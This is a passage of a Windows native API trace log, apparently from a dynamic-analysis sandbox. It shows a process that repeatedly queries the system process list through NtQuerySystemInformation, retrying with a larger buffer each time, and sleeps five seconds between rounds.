Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.249] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.301] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.324] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 